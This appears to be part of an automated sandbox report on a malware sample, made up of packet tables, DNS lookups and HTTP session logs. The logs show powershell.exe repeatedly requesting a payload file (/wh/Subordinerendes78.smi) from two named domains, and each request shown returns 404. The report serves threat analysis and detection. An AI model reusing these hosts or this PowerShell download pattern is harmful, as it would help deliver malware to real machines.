| Dec 5, 2024 10:42:04.694413900 CET | 49737 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:04.694698095 CET | 49737 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:08.692470074 CET | 49740 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:08.692512989 CET | 443 | 49740 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:08.692646980 CET | 49740 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:08.692850113 CET | 49740 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:08.692862034 CET | 443 | 49740 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:10.092026949 CET | 443 | 49740 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:10.107359886 CET | 49740 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:10.107392073 CET | 443 | 49740 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:10.639652014 CET | 443 | 49740 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:10.639830112 CET | 443 | 49740 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:10.639872074 CET | 49740 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:10.640137911 CET | 49740 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:14.648020029 CET | 49741 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:14.648062944 CET | 443 | 49741 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:14.648156881 CET | 49741 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:14.648382902 CET | 49741 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:14.648396015 CET | 443 | 49741 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:15.912837029 CET | 443 | 49741 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:15.914098978 CET | 49741 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:15.914112091 CET | 443 | 49741 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:16.371901035 CET | 443 | 49741 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:16.371979952 CET | 443 | 49741 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:16.372025967 CET | 49741 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:16.372498035 CET | 49741 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:20.380245924 CET | 49742 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:20.380299091 CET | 443 | 49742 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:20.380378008 CET | 49742 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:20.380609035 CET | 49742 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:20.380618095 CET | 443 | 49742 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:21.781630039 CET | 443 | 49742 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:21.782968998 CET | 49742 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:21.782987118 CET | 443 | 49742 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:22.378473043 CET | 443 | 49742 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:22.378648996 CET | 443 | 49742 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:22.378693104 CET | 49742 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:22.378956079 CET | 49742 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:26.379919052 CET | 49743 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:26.379964113 CET | 443 | 49743 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:26.380038023 CET | 49743 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:26.380312920 CET | 49743 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:26.380323887 CET | 443 | 49743 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:27.643716097 CET | 443 | 49743 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:27.644848108 CET | 49743 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:27.644872904 CET | 443 | 49743 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:28.105956078 CET | 443 | 49743 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:28.106048107 CET | 443 | 49743 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:28.106113911 CET | 49743 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:28.126296997 CET | 49743 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:32.223843098 CET | 49744 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:32.223897934 CET | 443 | 49744 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:32.224009991 CET | 49744 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:32.224231005 CET | 49744 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:32.224247932 CET | 443 | 49744 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:33.620743036 CET | 443 | 49744 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:33.622117996 CET | 49744 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:33.622143984 CET | 443 | 49744 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:34.170705080 CET | 443 | 49744 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:34.170902967 CET | 443 | 49744 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:34.170981884 CET | 49744 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:34.171360970 CET | 49744 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:38.192267895 CET | 49746 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:38.192315102 CET | 443 | 49746 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:38.192408085 CET | 49746 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:38.192636013 CET | 49746 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:38.192650080 CET | 443 | 49746 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:39.644301891 CET | 443 | 49746 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:39.645663977 CET | 49746 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:39.645692110 CET | 443 | 49746 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:40.107645988 CET | 443 | 49746 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:40.107723951 CET | 443 | 49746 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:40.107809067 CET | 49746 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:40.108243942 CET | 49746 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:44.114573002 CET | 49758 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:44.114634991 CET | 443 | 49758 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:44.114731073 CET | 49758 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:44.115078926 CET | 49758 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:44.115092993 CET | 443 | 49758 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:45.542413950 CET | 443 | 49758 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:45.543772936 CET | 49758 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:45.543797970 CET | 443 | 49758 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:46.087114096 CET | 443 | 49758 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:46.087338924 CET | 443 | 49758 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:46.087392092 CET | 49758 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:46.087683916 CET | 49758 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:50.083163977 CET | 49774 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:50.083236933 CET | 443 | 49774 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:50.083328009 CET | 49774 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:50.083581924 CET | 49774 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:50.083600998 CET | 443 | 49774 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:51.342288017 CET | 443 | 49774 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:51.343539953 CET | 49774 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:51.343574047 CET | 443 | 49774 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:51.802319050 CET | 443 | 49774 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:51.802392960 CET | 443 | 49774 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:42:51.803493977 CET | 49774 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:51.803889036 CET | 49774 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:42:55.817496061 CET | 49786 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:55.817544937 CET | 443 | 49786 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:55.817637920 CET | 49786 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:55.817919016 CET | 49786 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:55.817929983 CET | 443 | 49786 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:57.229000092 CET | 443 | 49786 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:57.231056929 CET | 49786 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:57.231097937 CET | 443 | 49786 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:57.778462887 CET | 443 | 49786 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:57.778681040 CET | 443 | 49786 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:42:57.778726101 CET | 49786 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:42:57.779217958 CET | 49786 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:01.787853956 CET | 49801 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:01.787900925 CET | 443 | 49801 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:01.788239002 CET | 49801 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:01.788239002 CET | 49801 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:01.788274050 CET | 443 | 49801 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:03.049154997 CET | 443 | 49801 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:03.062088013 CET | 49801 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:03.062124968 CET | 443 | 49801 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:03.510288000 CET | 443 | 49801 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:03.510365009 CET | 443 | 49801 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:03.510534048 CET | 49801 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:03.511346102 CET | 49801 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:07.520534992 CET | 49817 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:07.520591021 CET | 443 | 49817 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:07.520677090 CET | 49817 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:07.520889044 CET | 49817 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:07.520900011 CET | 443 | 49817 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:08.919774055 CET | 443 | 49817 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:08.920809031 CET | 49817 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:08.920830965 CET | 443 | 49817 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:09.466707945 CET | 443 | 49817 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:09.466882944 CET | 443 | 49817 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:09.466969013 CET | 49817 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:09.467422009 CET | 49817 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:13.485877037 CET | 49833 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:13.485918999 CET | 443 | 49833 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:13.485981941 CET | 49833 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:13.486263037 CET | 49833 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:13.486275911 CET | 443 | 49833 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:14.752337933 CET | 443 | 49833 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:14.753416061 CET | 49833 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:14.753448009 CET | 443 | 49833 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:15.212615967 CET | 443 | 49833 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:15.212734938 CET | 443 | 49833 | 184.171.244.231 | 192.168.2.4 |
| Dec 5, 2024 10:43:15.212796926 CET | 49833 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:15.213160992 CET | 49833 | 443 | 192.168.2.4 | 184.171.244.231 |
| Dec 5, 2024 10:43:19.247931957 CET | 49844 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:19.247997999 CET | 443 | 49844 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:19.248094082 CET | 49844 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:19.248584986 CET | 49844 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:19.248598099 CET | 443 | 49844 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:20.651515961 CET | 443 | 49844 | 148.251.114.233 | 192.168.2.4 |
| Dec 5, 2024 10:43:20.653148890 CET | 49844 | 443 | 192.168.2.4 | 148.251.114.233 |
| Dec 5, 2024 10:43:20.653260946 CET | 443 | 49844 | 148.251.114.233 | 192.168.2.4 |
                                                  Dec 5, 2024 10:43:21.197750092 CET44349844148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:21.198033094 CET44349844148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:21.198087931 CET49844443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:21.198609114 CET49844443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:25.225842953 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:25.225895882 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:25.225959063 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:25.226301908 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:25.226320028 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.488837004 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.491938114 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:26.491960049 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.949496984 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.949579954 CET44349860184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:26.949693918 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:26.950176001 CET49860443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:30.975912094 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:30.975991011 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:30.976068974 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:30.976386070 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:30.976403952 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.372203112 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.373467922 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:32.373493910 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.914637089 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.914832115 CET44349876148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:32.914933920 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:32.915153980 CET49876443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:36.927901030 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:36.927953959 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:36.935219049 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:36.939903021 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:36.939922094 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.201030016 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.204096079 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:38.204123974 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.662282944 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.662377119 CET44349887184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:38.662622929 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:38.662870884 CET49887443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:42.663767099 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:42.663827896 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:42.666644096 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:42.666796923 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:42.666814089 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.066129923 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.067996979 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:44.068027020 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.615699053 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.615885973 CET44349903148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:43:44.615978956 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:44.616322041 CET49903443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:43:48.614432096 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:48.614495993 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:48.614638090 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:48.614902020 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:48.614918947 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:49.875910997 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:49.877970934 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:49.877980947 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:50.336266994 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:50.336348057 CET44349918184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:43:50.336450100 CET49918443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:43:53.988748074 CET49918443192.168.2.4184.171.244.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 10:41:44.828754902 CET | 55406 | 53 | 192.168.2.4 | 1.1.1.1
Dec 5, 2024 10:41:44.968847036 CET | 53 | 55406 | 1.1.1.1 | 192.168.2.4
Dec 5, 2024 10:41:56.850373983 CET | 54252 | 53 | 192.168.2.4 | 1.1.1.1
Dec 5, 2024 10:41:56.990845919 CET | 53 | 54252 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 10:41:44.828754902 CET | 192.168.2.4 | 1.1.1.1 | 0x887d | Standard query (0) | www.almrwad.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:41:56.850373983 CET | 192.168.2.4 | 1.1.1.1 | 0x4f90 | Standard query (0) | www.erp-royal-crown.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 10:41:44.968847036 CET | 1.1.1.1 | 192.168.2.4 | 0x887d | No error (0) | www.almrwad.com | almrwad.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:41:44.968847036 CET | 1.1.1.1 | 192.168.2.4 | 0x887d | No error (0) | almrwad.com |  | 184.171.244.231 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:41:56.990845919 CET | 1.1.1.1 | 192.168.2.4 | 0x4f90 | No error (0) | www.erp-royal-crown.info | erp-royal-crown.info |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:41:56.990845919 CET | 1.1.1.1 | 192.168.2.4 | 0x4f90 | No error (0) | erp-royal-crown.info |  | 148.251.114.233 | A (IP address) | IN (0x0001) | false
• www.almrwad.com
• www.erp-royal-crown.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:41:46 UTC | 183 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:41:46 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:41:46 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:41:46 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:41:52 UTC | 65 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
2024-12-05 09:41:52 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:41:52 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:41:52 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:41:58 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:41:58 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:41:58 GMT
server: LiteSpeed
